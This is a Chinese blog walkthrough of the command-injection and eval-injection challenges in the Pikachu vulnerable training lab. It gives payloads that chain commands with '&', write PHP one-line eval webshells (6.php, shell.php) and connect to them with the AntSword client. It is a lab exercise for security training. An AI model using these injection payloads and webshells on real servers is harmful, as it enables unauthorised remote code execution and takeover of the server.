技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
rit8432499
15 小时前
C# Socket 聊天室(含文件传输)
服务器·开发语言·c#
trayvontang
16 小时前
Nginx之location配置
运维·nginx
十六年开源服务商
16 小时前
WordPress定制开发最佳公司的用户画像
运维
hkhkhkhkh123
16 小时前
Linux设备节点基础知识
linux·服务器·驱动开发
世岩清上
17 小时前
AI驱动的智能运维:从自动化到自主化的技术演进与架构革新
运维·人工智能·自动化
听*雨声
17 小时前
03_软考_网络安全
安全·web安全
张童瑶
17 小时前
Linux SSH隧道代理转发及多层转发
linux·运维·ssh
石小千
18 小时前
Linux安装OpenProject
linux·运维
柏木乃一
18 小时前
进程(2)进程概念与基本操作
linux·服务器·开发语言·性能优化·shell·进程
Lime-3090
18 小时前
制作Ubuntu 24.04-GPU服务器测试系统盘
linux·运维·ubuntu
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05【AutoGLM部署】本地私有化部署AI手机Agent06Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser07Open-AutoGLM Windows 安装部署教程08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09Neo4j(一) - Neo4j安装教程(Windows)10BongoCat - 跨平台键盘猫动画工具